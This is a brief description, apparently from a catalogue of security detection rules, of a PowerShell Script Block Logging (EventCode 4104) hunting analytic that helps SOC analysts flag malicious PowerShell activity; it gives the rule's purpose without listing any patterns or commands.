The PowerShell 4104 Hunting analytic is designed to identify suspicious activities related to the execution of PowerShell scripts through Script Block Logging (EventCode 4104). By analyzing the ScriptBlockText field for various patterns and keywords indicative of malicious behavior, this rule assists SOC analysts in detecting PowerShell-based threats, which are prevalent in modern cyber-attacks. This detection can reveal actions including code execution, privilege escalation, data exfiltration, or other malicious activities indicative of a compromised system. The rule aggregates results based on multiple evaluation metrics to flag potential threats effectively. It is critical for organizations to monitor PowerShell execution to mitigate risks associated with such powerful scripting capabilities.